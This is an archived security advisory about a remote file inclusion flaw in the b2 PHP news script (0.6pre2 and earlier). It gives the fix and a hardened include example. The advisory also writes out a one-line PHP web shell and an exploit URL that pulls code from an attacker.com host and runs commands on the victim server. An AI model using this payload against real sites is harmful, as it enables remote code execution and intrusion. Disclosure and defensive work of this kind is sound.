Site: www.cafelog.com
Vulnerable: b2 0.6pre2 and earlier.

B2 is a PHP script which allows webmasters to quickly post news on the front page and lets viewers interact with each other. A bug exists in the scripts which allows an attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php

*snippet*
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
*snippet*

But since b2config.php does not exist inside that directory, an attacker can define $b2inc himself. So if the attacker creates a file on his server, for example www.attacker.com, called b2functions.php, and writes the following in it:

<? system($cmd); ?>

(note: the attacker's server must not be able to run PHP; it has to serve the file as text)

he can include the file like this:

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls

This would execute the ls command on vulnerablehost.com.

Fix: Copy b2config.php into the b2-include directory.
The vendor has been warned, and already released the same fix a few days earlier.
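The include pattern quoted above trusts $b2inc to have been set by a config file that may not be there. The following is an added example of a hardened form of that pattern, not b2's own code: it assumes the same b2-include/ layout as the advisory and that b2config.php has been placed in that directory as the fix describes.

```php
<?php
// Added example (not b2's code): hardened version of the include pattern
// from b2edit.showposts.php. The base directory is set here, unconditionally,
// so nothing supplied by the request can influence where includes come from,
// whether or not a config file has run first.
$b2inc = dirname(__FILE__);   // the b2-include/ directory this script lives in

// Reject anything that is not an existing local directory. realpath() returns
// false for a URL such as http://www.attacker.com, so a remote include path
// can never reach the include_once() calls below.
$base = realpath($b2inc);
if ($base === false || !is_dir($base)) {
    die('b2: invalid include base directory');
}

// Fail closed if the configuration is missing instead of silently continuing
// with undefined variables (the original condition behind this advisory).
$config = $base . '/b2config.php';
if (!is_file($config)) {
    die('b2: b2config.php is missing from ' . $base);
}
include_once($config);

// Only files under the verified base directory are ever included.
include_once($base . '/b2functions.php');
?>
```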
This archive was generated by hypermail 2b30 : Mon May 06 2002 - 08:05:31 PDT